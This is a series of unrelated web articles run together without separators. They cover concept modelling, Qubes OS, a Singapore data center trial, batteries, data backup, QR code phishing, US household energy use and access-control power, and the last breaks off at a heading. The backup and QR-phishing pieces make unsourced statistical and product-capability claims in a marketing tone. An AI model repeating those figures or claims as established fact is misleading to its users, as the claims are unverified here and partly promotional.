As above, a good data model will try to reflect the entities that exist in the real world, so the model is not skewed to a particular use or application. Let's call that the Real World Test. Of course, it's hard to prove what's actually in the real world, so the Test is more art than science. There are no built-in checks that you have it right. It's all about craftsmanship and informal consensus ('Yeah, that looks about right.'). A lesser data model will not apply the Test as diligently — or apply it at all. As a consequence, if you don't share the designer's perspective on the problem space, then the data the data model ultimately defines is unlikely to hold much value for you. Think silo.

Lesser data models can go off the rails for a host of reasons. Common causes include these:
- The data model is created for some specific analytic purpose(s), and so 'sums up' the real world in a manner best suited to particular computations.
- The data model is created to support some specific points of data access or usage (e.g., GUIs, interfaces, migration, exchange, etc.), and so is skewed to those particular handshakes.
- The data model (usually a class diagram) is created to aid and support software development, and so gradually (or quickly) drifts toward reflecting the internal reality of the software system design.

But even diligent adherence to the Real World Test runs into difficulties when the things (entities) in the problem space don't actually exist in the real (physical) world. Virtually every problem space includes at least some things that are purely inventions of the human mind. At the extreme, think insurance and finance. What do you do in that case?

Consistency Tests for Language

The two-part answer is to (a) entertain only ideas that are completely innocent of system design and (b) re-orient yourself toward ensuring the consistency of what you say and write about those ideas. Now we're back to business communication and disambiguation — that is, to concept models. A concept model necessarily focuses on natural language. (There's no way to talk or write about complex ideas if they are not expressed in some form.)
A concept model provides patterns, both built-in and add-on, to 'prove' that what is said or written about a problem space is consistent (or not!) with everything else that is said and written about it. If you are thinking about a concept model as primarily a diagram, you're missing the picture. A graphical representation of the patterns in a concept model can be quite helpful, but it's a convenience, not a necessity. This fact alone would make concept models distinct from data models. Who would want a data model if not graphical? You might as well go directly to the schema (database definition). So, understanding a concept model requires full appreciation of what it brings to the table in determining the consistency of what is said and written.

The first and most fundamental step in ensuring consistency in what is said and written is robust business definitions of all concepts. That's where the rubber meets the road. All definitions must be unique, and each must express a distinguishable concept. A simple glossary is a step in the right direction, but falls way short of the quality of definitions needed for disambiguation. Within the wordings of robust definitions, worked-out schemes are needed for such things as:
- generalization/specialization — e.g., a tiger is a mammal
- classification — e.g., Paris is a city
- partitive relationships — e.g., a chassis is a part of a vehicle

In other words, definitions not only need to be business-oriented, they need to act as artifacts of knowledge representation. How else can you hope to prove the consistency of what is said and written?

Consistency Checks for Sentences

Try writing a sentence without a verb. In most natural languages it's impossible. Even in languages where it's possible, grammatical rules about defaults apply. The bottom line is that there is always a verb in a sentence, even if implicit. Sentences are how we communicate. A sentence represents a complete thought (a proposition in logic). A statement without a verb, explicit or otherwise, simply isn't a complete thought. Incomplete thoughts, of course, are never high-quality thoughts. Neither are sentences expressed using ambiguous or inconsistent verbs.

Not surprisingly, therefore, concept models place as much emphasis on verbs and verb phrases as on nouns. These verbs and verb phrases in your business vocabulary are 'add-on' patterns of expression. Your business, for example, must decide whether it prefers 'party makes request' or 'party submits request' in sentences that are written. Maybe either one is acceptable (i.e., they are synonyms). Or maybe they mean something different altogether. In writing complex thoughts, by far the most common cause of ambiguity (beyond misuse of nouns and poor definitions) is missing or inconsistent verbs. When you step up to that challenge in business communication you'll realize doing a data model is nonsensical as a starting point.

A concept model is basically a set of language patterns that scales in disambiguating large amounts of business communication (including business rules, of course). It provides built-in checks that you have expressed something right. It's not about craftsmanship and informal consensus; it's about engineering consistency and clarity where it counts the most — in the language we use to communicate business knowledge.
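As a toy illustration of what such 'add-on' verb-phrase patterns might look like when made machine-checkable, consider the sketch below. The vocabulary entries come from the 'party makes/submits request' example above; everything else (the data structures, the checking function) is our own illustrative assumption, not part of SBVR or any standard tooling.

```python
# A tiny business vocabulary: noun concepts plus the verb phrases
# (fact types) the business has agreed to use between them.
CONCEPTS = {"party", "request"}
FACT_TYPES = {("party", "submits", "request")}
SYNONYMS = {"makes": "submits"}  # 'party makes request' is accepted wording

def sentence_is_consistent(subject: str, verb: str, obj: str) -> bool:
    """Check a subject-verb-object wording against the vocabulary."""
    verb = SYNONYMS.get(verb, verb)
    return (subject in CONCEPTS
            and obj in CONCEPTS
            and (subject, verb, obj) in FACT_TYPES)

assert sentence_is_consistent("party", "makes", "request")        # consistent
assert not sentence_is_consistent("party", "cancels", "request")  # undefined verb
```

Crude as it is, this captures the point of the section: once nouns, verbs, and synonyms are pinned down, inconsistent wordings can be caught mechanically rather than by informal consensus.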
The Business Agility Manifesto: Building for Change, by Roger T. Burlton, Ronald G. Ross, and John A. Zachman (2017), https://busagilitymanifesto.org/

Concept models are a central focus of the OMG standard Semantics of Business Vocabulary and Business Rules (SBVR). For more information on SBVR, see SBVR Insider on BRCommunity.com, http://www.brcommunity.com/standards.php?id=620

# # #
Qubes OS - A Security-Oriented Operating System

Qubes OS is a security-oriented operating system (OS). The OS is the software that runs all the other programs on a computer. Some examples of popular OSes are Microsoft Windows, Mac OS X, Android, and iOS. Qubes is free and open-source software (FOSS). This means that everyone is free to use, copy, and change the software in any way. It also means that the source code is openly available so others can contribute to and audit it.

Why is OS security important?

Most people use an operating system like Windows or OS X on their desktop and laptop computers. These OSes are popular because they tend to be easy to use and usually come pre-installed on the computers people buy. However, they present problems when it comes to security. For example, you might open an innocent-looking email attachment or website, not realizing that you're actually allowing malware (malicious software) to run on your computer. Depending on what kind of malware it is, it might do anything from showing you unwanted advertisements to logging your keystrokes to taking over your entire computer. This could jeopardize all the information stored on or accessed by this computer, such as health records, confidential communications, or thoughts written in a private journal. Malware can also interfere with the activities you perform with your computer. For example, if you use your computer to conduct financial transactions, the malware might allow its creator to make fraudulent transactions in your name.

Aren't antivirus programs and firewalls enough?

Unfortunately, conventional security approaches like antivirus programs and (software and/or hardware) firewalls are no longer enough to keep out sophisticated attackers. For example, nowadays it's common for malware creators to check to see if their malware is recognized by any signature-based antivirus programs. If it's recognized, they scramble their code until it's no longer recognizable by the antivirus programs, then send it out. The best of these programs will subsequently get updated once the antivirus programmers discover the new threat, but this usually occurs at least a few days after the new attacks start to appear in the wild. By then, it's too late for those who have already been compromised. More advanced antivirus software may perform better in this regard, but it's still limited to a detection-based approach. New zero-day vulnerabilities are constantly being discovered in the common software we all use, such as our web browsers, and no antivirus program or firewall can prevent all of these vulnerabilities from being exploited.

How does Qubes OS provide security?

Qubes takes an approach called security by compartmentalization, which allows you to compartmentalize the various parts of your digital life into securely isolated compartments called qubes. This approach allows you to keep the different things you do on your computer securely separated from each other in isolated qubes so that one qube getting compromised won't affect the others. For example, you might have one qube for visiting untrusted websites and a different qube for doing online banking. This way, if your untrusted browsing qube gets compromised by a malware-laden website, your online banking activities won't be at risk. Similarly, if you're concerned about malicious email attachments, Qubes can make it so that every attachment gets opened in its own single-use disposable qube.
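To make the compartmentalization model a little more tangible, here is a minimal sketch that drives qubes from dom0 using Python's subprocess module. qvm-run is the standard Qubes command-line tool for running a program inside a named qube; the qube names ("untrusted", "banking") are illustrative assumptions.

```python
import subprocess

def run_in_qube(qube: str, command: str) -> None:
    """Launch `command` inside the given qube (run from dom0)."""
    subprocess.run(["qvm-run", qube, command], check=True)

# The same browser, but in two isolated worlds: a compromise of the
# "untrusted" qube has no path into the "banking" qube.
run_in_qube("untrusted", "firefox")
run_in_qube("banking", "firefox")
```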
In this way, Qubes allows you to do everything on the same physical computer without having to worry about a single successful cyberattack taking down your entire digital life in one fell swoop. Moreover, all of these isolated qubes are integrated into a single, usable system. Programs are isolated in their own separate qubes, but all windows are displayed in a single, unified desktop environment with unforgeable colored window borders so that you can easily identify windows from different security levels. Common attack vectors like network cards and USB controllers are isolated in their own hardware qubes while their functionality is preserved through secure networking, firewalls, and USB device management. Integrated file and clipboard copy and paste operations make it easy to work across various qubes without compromising security. The innovative Template system separates software installation from software use, allowing qubes to share a root filesystem without sacrificing security (and saving disk space, to boot). Qubes even allows you to sanitize PDFs and images in a few clicks. Users concerned about privacy will appreciate the integration of Whonix with Qubes, which makes it easy to use Tor securely, while those concerned about physical hardware attacks will benefit from Anti Evil Maid.

How does Qubes OS compare to using a "live CD" OS?

Booting your computer from a live CD (or DVD) when you need to perform sensitive activities can certainly be more secure than simply using your main OS, but this method still preserves many of the risks of conventional OSes. For example, popular live OSes (such as Tails and other Linux distributions) are still monolithic in the sense that all software is still running in the same OS. This means, once again, that if your session is compromised, then all the data and activities performed within that same session are also potentially compromised.

How does Qubes OS compare to running VMs in a conventional OS?

Not all virtual machine software is equal when it comes to security. You may have used or heard of VMs in relation to software like VirtualBox or VMware Workstation. These are known as "Type 2" or "hosted" hypervisors. (The hypervisor is the software, firmware, or hardware that creates and runs virtual machines.) These programs are popular because they're designed primarily to be easy to use and run under popular OSes like Windows (which is called the host OS, since it "hosts" the VMs). However, the fact that Type 2 hypervisors run under the host OS means that they're really only as secure as the host OS itself. If the host OS is ever compromised, then any VMs it hosts are also effectively compromised.

By contrast, Qubes uses a "Type 1" or "bare metal" hypervisor called Xen. Instead of running inside an OS, Type 1 hypervisors run directly on the "bare metal" of the hardware. This means that an attacker must be capable of subverting the hypervisor itself in order to compromise the entire system, which is vastly more difficult. Qubes makes it so that multiple VMs running under a Type 1 hypervisor can be securely used as an integrated OS. For example, it puts all of your application windows on the same desktop with special colored borders indicating the trust levels of their respective VMs. It also allows for things like secure copy/paste operations between VMs, securely copying and transferring files between VMs, and secure networking between VMs and the Internet.

How does Qubes OS compare to using a separate physical machine?
Using a separate physical computer for sensitive activities can certainly be more secure than using one computer with a conventional OS for everything, but there are still risks to consider. Briefly, here are some of the main pros and cons of this approach relative to Qubes:
- Physical separation doesn't rely on a hypervisor. (It's very unlikely that an attacker will break out of Qubes' hypervisor, but if one were to manage to do so, one could potentially gain control over the entire system.)
- Physical separation can be a natural complement to physical security. (For example, you might find it natural to lock your secure laptop in a safe when you take your unsecure laptop out with you.)
- Physical separation can be cumbersome and expensive, since we may have to obtain and set up a separate physical machine for each security level we need.
- There's generally no secure way to transfer data between physically separate computers running conventional OSes. (Qubes has a secure inter-VM file transfer system to handle this.)
- Physically separate computers running conventional OSes are still independently vulnerable to most conventional attacks due to their monolithic nature.
- Malware which can bridge air gaps has existed for several years now and is becoming increasingly common.
Singapore plans to conduct trials of what it calls the world's first data center designed specifically for tropical climates, as part of a bid to drive innovation and explore new green technologies. Initiated by the Infocomm Development Authority of Singapore (IDA), the Tropical Data Center (TDC) project will be set up in partnership with hardware makers and industry experts. Partners will provide either hardware, software, or expertise, and the trial will be conducted in a test environment at a Keppel Data Centre facility. Organizations that have signed up so far include Dell, Fujitsu, Hewlett Packard Enterprise, Huawei, and Intel, as well as ERS, The Green Grid, and the Nanyang Technological University (NTU). The objective is to create a proof of concept demonstrating that data centers can function optimally at temperatures of up to 38 degrees Celsius and ambient humidity of 90 percent and higher.

It's getting hot in here

According to the IDA, data centers are typically cooled to between 20 and 25 degrees Celsius and kept to within 50 to 60 percent relative ambient humidity. A TDC could hence reduce energy costs by up to 40 percent and significantly reduce carbon emissions. While running data centers at higher temperatures is nothing new, such environments are typically built away from the tropics, or entail the use of air-side economizers in cooler climates to bring down cooling costs. A successful TDC trial could convince CIOs and data center managers that temperatures can be increased in a data center without harming either performance or reliability. While details are still being worked out, some potential test setups could include having no temperature controls but controlled humidity, or an absence of both temperature and humidity controls. The TDC will be set up in the third quarter of 2016 and will run simulated workloads over a projected time frame of up to a year.

"With Singapore's continued growth as a premium hub for data centers, we want to develop new technologies and standards that allow us to operate advanced data centers in the most energy efficient way in a tropical climate," said Khoong Hock Yun, assistant chief executive at the IDA. "New ideas and approaches, such as raising either the ambient temperature or humidity, will be tested to see if these can greatly increase our energy efficiency, with insignificant impact on the critical data center operations," he added.

According to the IDA, data centers accounted for seven percent of Singapore's total energy consumption in 2012, and are projected to reach 12 percent of the country's total energy consumption by 2030 due to the continued growth of data centers based there.
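For a rough feel of where the claimed "up to 40 percent" saving could come from, here is a back-of-the-envelope sketch in terms of Power Usage Effectiveness (PUE). Every number in it is an assumption for illustration; the article does not report the trial's actual PUE figures.

```python
IT_LOAD_KW = 1000.0  # assumed IT load

def facility_power(it_kw: float, pue: float) -> float:
    # PUE = total facility power / IT power, so total = IT * PUE.
    return it_kw * pue

conventional = facility_power(IT_LOAD_KW, 1.7)  # chilled to 20-25 C (assumed)
tropical = facility_power(IT_LOAD_KW, 1.4)      # running warm and humid (assumed)

overhead_saving = (conventional - tropical) / (conventional - IT_LOAD_KW)
print(f"cooling/overhead energy cut: {overhead_saving:.0%}")  # ~43%
```

Under these assumed PUEs, the saving comes almost entirely out of the cooling overhead, which is consistent with the article's point that raising temperature and humidity setpoints mainly attacks the cooling bill.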
Power has been a constant necessity since the dawn of human civilization, and with a source of power that is both renewable and clean, we can counter power shortages. Our best shot at achieving that is through the advancement of battery technology. To better understand this industry, we need to understand the basics first.

A battery is essentially a device that transforms stored chemical energy into electricity. One or more cells, each consisting of a positive electrode, a negative electrode, an electrolyte, and a separator, make up a battery. Battery companies are constantly searching for better chemistries that can supply more power at a lower cost. There are three primary battery technologies through which we may secure an ample energy supply in the future: lithium-ion batteries, lithium-sulphur batteries, and solid-state batteries. Lithium-ion is steadily emerging as the most advanced battery technology available.

The global battery market is also expanding at a steady pace. In 2020 its valuation was 92.0 billion USD, and by 2025 it is expected to grow to 152.3 billion USD. A battery is a way to store energy, and hence it is needed to operate almost everything from your phone to your laptop. The market is also proliferating with the extensive use of batteries in electric vehicles (EVs) and mobile computing. Due to rapid urbanization and a constantly growing population, renewable energy is becoming essential to the continuation of modern life, and battery technology gives us a surefire path toward it.
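As a quick sanity check on the market figures above, the implied compound annual growth rate can be computed directly; the snippet below is just that arithmetic, nothing more.

```python
# Implied CAGR from the market sizes quoted above (USD billions).
start, end, years = 92.0, 152.3, 5  # 2020 -> 2025

cagr = (end / start) ** (1 / years) - 1
print(f"implied CAGR: {cagr:.1%}")  # about 10.6% per year
```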
In the present era, our ecosystem has become increasingly dependent on digital technologies and gizmos, and as a result, cybercriminal activity has become a burgeoning nuisance. Hence, there is no doubt that both data backup and data security have become increasingly significant to carrying out business operations. This is borne out by the news, media, entertainment, corporate enterprises, and the financial sector all readily deploying information technology. Cybersecurity companies state that 12 cyberattacks occur every minute, alongside a 50% increase in unique attacks and malware, and the US is by far the country to have stopped the largest number of cyberattacks in 2023.

Fortunately, it isn't just cybercrime that skyrocketed last year; data backup and security have also been mounting. Specifically, most online businesses and ecommerce stores began to gather a tremendous volume of volatile information, thus creating Big Data. This data can include extraordinarily personal and sensitive information such as PII (Personally Identifiable Information) and SPI (Sensitive Personal Information). Without proper interventions, such as adequate file backup and cybersecurity measures, those with malevolent intentions can easily attack this information. A recent study revealed that over 33 billion accounts are likely to be breached in 2023, so countless organizations and renowned establishments actively pursue keeping customers and their information safe by arranging several security tactics. These can include cloud backup, online backup, and offline backup, to name a few. To delve deeper into this subject, here are some prominent reasons why data backup and security solutions are mandatory today.

A Legal Requirement in Many Countries

Due to the incredible losses of private and personal information in past decades, which caused billions of dollars in damages, international data privacy laws have been established and are carried out diligently. Not following these security parameters can result in legal action by the presiding government and authorities. In the United States, several data privacy laws regulate how a person's private data is collected, handled, processed, shared, and used. Furthermore, specific federal laws are also imposed to protect citizens from data misuse. Likewise, throughout Europe, the GDPR (General Data Protection Regulation) is a cornerstone of EU privacy law and human rights law. Following these laws and legal regulations is compulsory. They generally deal with data collection, the transfer of personal data, and the duties of data controllers and processors. Industry-specific laws to protect personal information and data have also been established and vigorously implemented to safeguard users and customers. For instance, the PCI DSS (Payment Card Industry Data Security Standard) is an information security standard for handling credit cards from the major card brands.

Apart from being a legal requirement, many brands and businesses approach backup and security solution providers because doing so offers various rewards and benefits. Some of the most noticeable include:
- Data loss prevention. Data loss can occur for many reasons, such as hardware or software failures, natural disasters, human errors, and malicious attacks.
- Resolute auditing and reporting. Enterprises are obligated to save their financial records and accounting data for tax reporting.
- Business continuity. Keeping backups helps businesses keep their operations running.
- Archiving. Backups enable the safe accumulation and storage of client-related details, simplify the creation of archives, and ease access for those who need the information to carry out their duties and responsibilities.
- Faster data recovery when a business is exposed to a virus, phishing, or hacking attack. If a system becomes infected by malware such as ransomware, backups help recover essential and sensitive data.
- Competitive value. It is vital for businesses to resume operations and recover as quickly as possible; data backup gives companies a competitive edge over rivals within their industries and market niches.
- Mitigating downtime. One outcome of data loss is the additional work needed to restore data, and while data is being recovered, business operations are on hold. Backups reduce downtime, which is pure waste for many ventures.

A Strong Component of Network Security

When chasing robust information security, IT security, or computer security, people often overlook the significance of data backup. In reality, data security and data backup are essential components of any set of cybersecurity measures. Primary data failures caused by malicious attacks (viruses, malware, hackers, or other cybercriminals) can be mitigated with the assistance of backups: backup copies enable enterprises and establishments to restore data from an earlier point and recover from unforeseeable events.

In today's world, keeping information safe and secure is essential for businesses to sustain operations and remain profitable. Loss of valuable data can bring a venture's operations to a complete halt and cost it its reputation with the public. Recovering from such an incident is extremely difficult, because a loss of trust eventually results in a loss of customers and services. Therefore, companies and organizations must not only install but also actively carry out the best data security practices. The importance of data backups and security in guarding against data theft or loss is indisputable.

Why should I back up my data?
It is a legal requirement for ventures and businesses in many parts of the world, and it offers countless benefits and a competitive edge.

How does a backup help after an incident?
In an event such as a natural disaster, human error, or a malicious attack, a backup lets you quickly recover sensitive and valuable data, reducing downtime and restoring business operations.

What are the different types of backup?
The three main types of data backup, compared in the short sketch after this FAQ, are:
Full backup – a complete copy of all available files and folders, stored regularly on secondary storage media.
Incremental backup – begins with one full backup, after which each subsequent backup stores only the data that has changed since the most recent backup of any kind.
Differential backup – begins with a full backup, after which each subsequent backup stores all changes made to files and folders since that full backup.

What are the benefits of cloud backup?
Cloud data backup offers a wide range of benefits, such as:
Assisting in annual reporting exercises.
Enhancing security and protection of data from malicious activity.
Simplifying management by making data restoration less stressful and time-consuming.
Reliable reproduction of data after restoration.
Significant cost savings by reducing workforce expenses.
Reduced workload, since backup data removes redundant tasks such as manual data recovery.
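To make the incremental-versus-differential distinction concrete, here is a minimal sketch in Python. It is an illustration only: the "/data" path and the timestamps are assumptions, and real backup tools rely on snapshots, archive bits, or change journals rather than raw modification times.

```python
import os

def files_changed_since(root: str, since_epoch: float) -> list[str]:
    """Return paths under `root` whose modification time is newer than `since_epoch`."""
    changed = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getmtime(path) > since_epoch:
                    changed.append(path)
            except OSError:
                pass  # file vanished or is unreadable; skip it
    return changed

# Hypothetical timestamps recorded by a backup job (seconds since the epoch).
last_full_backup = 1_700_000_000.0  # when the last FULL backup ran
last_any_backup = 1_700_086_400.0   # when the most recent backup of ANY kind ran

# Incremental: only what changed since the most recent backup of any kind.
incremental = files_changed_since("/data", last_any_backup)

# Differential: everything that changed since the last full backup.
differential = files_changed_since("/data", last_full_backup)
```

The differential set keeps growing until the next full backup runs, which is why differentials are simpler to restore (full plus latest differential) but larger, while incrementals stay small but must be replayed in order.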
A guide to understanding and avoiding a new type of cyberattack that targets both individuals and organizations.

QR codes are everywhere in our modern lives, easily linking us to restaurant menus, websites, and apps with a quick scan from our phones. However, as we use QR codes more often, we also face more risks from attackers. QR code phishing, also known as "quishing," is a type of cyberattack that has been growing steadily in popularity: according to one report, one QR phishing campaign increased by 2,400% since May 2023. This article will teach you how to identify and prevent QR code phishing.

What is QR Code Phishing?

QR codes are square-shaped images that encode information such as URLs, contact details, or payment information. They are often used to simplify and speed up the process of accessing websites, making payments, or sharing information. However, they can also be used by cybercriminals to trick you into visiting malicious websites, downloading malware, or giving away your personal or financial information. This is called QR code phishing, and it is a new type of cyberattack that targets your smartphone.

QR code phishing works by exploiting the trust and convenience that QR codes offer. You may scan a QR code on a poster, a flyer, a product, or a website, expecting it to take you to a legitimate site or service. However, the QR code may have been tampered with or replaced by a hacker, and it may redirect you to a fake site that looks like the real one. There, you may be asked to enter your login credentials, your credit card details, or other sensitive information. Alternatively, the QR code may download a malicious app or file onto your phone, which can compromise your device and data.

(Example of what a QR code scam looks like)

5 Common Scenarios of QR Code Scams

QR code email scam

Scammers often send phishing emails with QR codes in them; this method is what gave "quishing" its name. These emails pretend to be from a reputable company and ask you to scan the QR code they contain. For example, they may claim that your payment for an online order was unsuccessful and that you need to scan the QR code to re-enter your credit card information. Victims who scan the code land on a legitimate-looking website, enter their payment details, and hand their credit card information straight to the cybercriminal.

QR code payment scam

QR codes are used by legitimate businesses for contactless payments, a practice that became very popular during the peak of the COVID-19 pandemic because it let customers pay without touching card readers, reducing the risk of infection. However, scammers can place QR codes in public places to take your money or credit card information. For example, criminals have put up signs in parking lots telling drivers they can scan the QR code to pay for parking; the code took them to a website that looked real but wasn't.

QR code package scam

If you ever get a strange package in the mail with a QR code, don't scan it. In this kind of QR code fraud, criminals send you a package you never ordered. Inside the package (or on the box) is a QR code you can supposedly scan to get more details about the order or to send it back. The QR code takes you to a website that asks you to enter your personal information, such as your credit card number.
QR code cryptocurrency scam

QR codes are often used for crypto transactions, and criminals exploit this to steal cryptocurrency from victims. They may contact you with a "giveaway" promising twice the crypto back if you send them crypto first; you will never get anything back. Scammers may also invite you to join an "investment" and ask you to send them crypto, then disappear with it, never to be heard from again.

QR code donation scam

Scammers may impersonate a charity, or invent a fake one, to take your money or credit card information. They may put QR codes on flyers, or send them to you through text or email, asking you to donate to a cause.

How to Avoid QR Code Phishing?

QR code phishing can be difficult to spot, as you may not be able to see the URL or the destination of a QR code before you scan it. However, there are some steps you can take to protect yourself and your smartphone. Here are some tips to avoid QR code phishing:

- Be cautious about where you scan. Only scan QR codes from reliable sources, such as official websites, products, or services. Don't scan QR codes from unknown or dubious sources, such as unsolicited emails, messages, or ads.
- Use a QR code scanner app with security features. Some scanner apps can identify and warn you if a QR code is harmful or leads to a phishing site. You can also use a scanner app that lets you preview the URL or the content of the QR code before you open it.
- Check the URL or the site before you enter any information. If you scan a QR code and it takes you to a website, make sure the URL matches the expected site and that it uses a secure connection (https). Look for signs of phishing, such as spelling mistakes, poor design, or unusual requests. (A short sketch of this kind of URL check follows the next section.)
- Do not download or open any files or apps from QR codes. A QR code should not ask you to download or install anything on your phone. If one does, do not continue, and delete the file or app right away.
- Keep your phone and apps updated. Make sure your phone and apps have the latest security patches and updates, which help prevent malware infections and phishing attacks.

How Can Microsoft Technologies Help?

Microsoft offers a range of technologies and solutions that can help you stay safe from QR code phishing and other cyberthreats. Some of these include:

Microsoft 365 Defender. This is an enterprise-grade security solution that provides best-in-class mail filtering. It can identify threats, including quishing, and quarantine malicious messages before they reach your inbox.

Microsoft Defender for Endpoint. This is a cloud-based security solution that provides comprehensive protection for your devices, data, and identity. It can detect and block malicious QR codes, websites, apps, and files, and it can alert you to suspicious or risky activity on your phone.

Microsoft Authenticator. This is an app that enables two-factor authentication (2FA) for your online accounts, adding an extra layer of security to your login process. It can also scan QR codes and verify their authenticity, and it can generate secure passwords for your accounts.

Microsoft Edge. This is a web browser with built-in security and privacy features, such as SmartScreen, Tracking Prevention, and InPrivate mode. It can warn you about phishing or malicious sites and block unwanted ads and trackers.
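To make the "check the URL before you enter any information" tip concrete, here is a minimal sketch of the kind of red-flag checks a scanner app (or a cautious user) can run on a URL decoded from a QR code. The trusted-domain list is an assumption for the example, and these heuristics are a starting point, not a complete defense.

```python
from urllib.parse import urlparse

TRUSTED_DOMAINS = {"microsoft.com", "softlanding.ca"}  # example allow-list (assumption)

def looks_suspicious(url: str) -> list[str]:
    """Return a list of red flags found in a URL decoded from a QR code."""
    flags = []
    parsed = urlparse(url)

    if parsed.scheme != "https":
        flags.append("not using a secure (https) connection")
    host = parsed.hostname or ""
    if host and not any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS):
        flags.append(f"domain '{host}' is not on the trusted list")
    if host.replace(".", "").isdigit():
        flags.append("raw IP address instead of a domain name")
    if "@" in parsed.netloc:
        flags.append("'@' in the URL, often used to disguise the real host")
    return flags

print(looks_suspicious("http://192.168.0.10/pay"))            # several red flags
print(looks_suspicious("https://www.microsoft.com/account"))  # empty list
```

A real scanner would combine checks like these with reputation services and block lists.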
By following these tips, you can enjoy the benefits of QR codes without putting yourself at risk of QR code phishing. Remember: always think before you scan, and stay vigilant about suspicious or unexpected QR codes. If you want to bolster your cybersecurity, feel free to reach out to Softlanding. We have a number of services and solutions to help you prevent, detect, and remediate phishing attacks.
Household Electric Consumption Varies by Region

According to the newest residential energy consumption report (the "2020 Residential Energy Consumption Survey"), published by the U.S. Energy Information Administration (EIA), U.S. households consumed an average of 76.7 million British thermal units (MMBtu) of site energy in 2020.

The site energy a household uses correlates strongly with the average outdoor temperature. For example, households in colder climates, where space heating equipment is used more intensively, tend to consume more site energy than households in warmer parts of the country. Of the 15 states with average annual temperatures above the national average (59.4°F), every state except Oklahoma had average household energy use below the national average.

"Site energy" refers to the amount of energy that enters a home, including electricity from the grid, electricity from onsite solar panels, natural gas, propane, and fuel oil. Site energy includes different forms of energy, and with respect to electricity, it does not account for the losses associated with converting primary fuels to electricity or the electrical losses in the transmission and distribution system. "Site energy consumption" combines the energy consumption of all end uses in a home, including seasonal end uses such as space heating and cooling as well as non-seasonal end uses such as cooking and consumer electronics. The EIA added, "Although our analysis averages site energy consumption across a large number of homes to obtain state-level estimates, the consumption within an individual home can vary widely based on the efficiency of the heating and cooling equipment."

In 2020, according to the report, Hawaii was the warmest state, using an average of 30.3 MMBtu per household; only six percent of homes in Hawaii were heated, and just 57 percent used air conditioning. Conversely, Alaska was the coldest state, using an average of 125.1 MMBtu per household; 99 percent of homes in Alaska used space-heating equipment, while only seven percent used air conditioning.

"Although site energy consumption is determined by many factors, including varying household behaviors, building construction, and the efficiencies of heating and cooling equipment, space heating and cooling as used in the United States leads to a correlation between average site energy consumption and average temperature," said the EIA.

In 2020, average energy expenditures, the amount of money a household spent on site energy, were affected by several factors beyond temperature, such as the type of energy used. For example, households in North Dakota (the second-coldest state) used an average of 94.3 MMBtu in 2020, nearly twice as much as homes in Florida (the second-warmest state) at 50.3 MMBtu. However, average energy expenditures were about the same in both states, $1,648 in North Dakota and $1,654 in Florida, in part because more than three-quarters of households in Florida reported using only electricity in their homes, and U.S. average residential electricity prices are more than three times higher than residential natural gas prices.
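For readers more used to electric-bill units, MMBtu figures convert directly to kilowatt-hours (1 kWh ≈ 3,412 Btu). Here is a quick sketch of the conversion using the figures above; note that site energy covers all fuels entering the home, so these kWh totals are a unit conversion, not an electricity bill.

```python
BTU_PER_KWH = 3412.14  # physical constant: Btu per kilowatt-hour

def mmbtu_to_kwh(mmbtu: float) -> float:
    """Convert millions of Btu (MMBtu) to kilowatt-hours."""
    return mmbtu * 1_000_000 / BTU_PER_KWH

for label, mmbtu in [("US average", 76.7), ("Hawaii", 30.3), ("Alaska", 125.1)]:
    print(f"{label}: {mmbtu} MMBtu is about {mmbtu_to_kwh(mmbtu):,.0f} kWh")
# US average: 76.7 MMBtu is about 22,478 kWh
# Hawaii: 30.3 MMBtu is about 8,880 kWh
# Alaska: 125.1 MMBtu is about 36,663 kWh
```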
Access control is one of those essential functions that ought to be working at all times. However, like most electronics, it needs power to operate. There is, of course, the alternative of just using a traditional lock and key, but that's no fun (and physical keys are easily lost and manipulated, and are a hassle to replace!). In this article, we'll explore the role that power plays in access control, and how to address a power outage with respect to your security access system.

Why does power matter for access control?

In this first section, we'll explore why power is needed for access control, looking at the two main components that require it: door locks and the access control readers themselves.

Electric Locks Need Electricity

For any modern door that uses an access control system, the lock will be powered by electricity; this is what we call an electric lock. Electric locks fall into two categories: fail-safe and fail-secure. For a deeper dive into electric lock types, you can check out this in-depth Kisi guide, and for an explanation of the difference between a fail-safe lock and a fail-secure magnetic lock you can check out this one.

Fail-Safe Locks

Fail-safe locks operate on the principle that as long as power is supplied, the lock is engaged; when an unlock is triggered, the power cuts out and the lock opens. These are generally used for emergency exits, or in situations where an exit must still be possible if the power is cut. However, this doesn't mean the power should stay out: if the power is out, anyone can get into your space, whether they have access or not.

(Example of a fail-safe magnetic lock)

Fail-Secure Locks

Fail-secure locks work the other way around: as long as they are not powered, they stay locked, and when an unlock is triggered, power is applied and you can open the door. The need for power is more obvious here: without electricity flowing to the locks, you can't actually open them.

(Example of a fail-secure bolt lock)

Communicating With the Servers

It's not only the locks that need power; your access control readers and controllers need it to function too.

(Wiring diagram of access control infrastructure)

The readers need power to communicate access information to the wireless locks and to the controller, and the controller itself needs power to transmit unlock information back and forth from the servers. With most modern access control data living in a decentralized cloud infrastructure (like Kisi's), the data is hosted on the provider's servers, and despite all the advantages that offers, it means the controller needs to be in constant contact with the server. While offline functionality (in the case of an internet outage) is possible, without electricity the controller cannot transmit this information, and the readers cannot authenticate access control credentials.

What could cause a power outage?

It's important to try to identify the cause of a power outage. Power supply to your building or office most likely involves a complex infrastructure of electrical components, and one weak connection, or any of a myriad of unforeseen events, can shut down the entire system. Figuring out what caused the outage can help you address it and ensure it doesn't happen again.

The first possible cause is a natural disaster. This can be anything from a broken pipe, to termite damage, to an intrepid squirrel burrowing in your walls and chewing through your wires.
These are generally not foreseeable, and in these situations there's not much you can do other than call a repairman and hope that you were well prepared. We'll give tips for that second part in the last section of this article.

Building Power Went Out

If your power goes out and you're in a larger office building, it's probably a safe bet that power to the entire building is out. In these situations, you should know beforehand whether your building has systems or protocols in place for addressing a building-wide power outage. It likely has some sort of backup power supply or other system to make sure that office operations can continue as usual. However, if building-wide outages happen regularly, it might be worth renegotiating your rental contract, or looking into new office space!

Breaker Overload

A common cause of power outages is overconsumption: wiring too many devices to the same supply, causing the breaker to trip and leaving you high and dry. Thankfully, this is the easiest to address. Reset the breaker (or replace it if it has failed), and then make sure you distribute the electrical load more evenly across circuits to prevent it from happening again.

How to Ensure That You Have Backup Power

Now we arrive at the practical advice: making sure that your office has an adequate backup power system so that you're prepared in case the power goes out.

Is backup power legally needed?

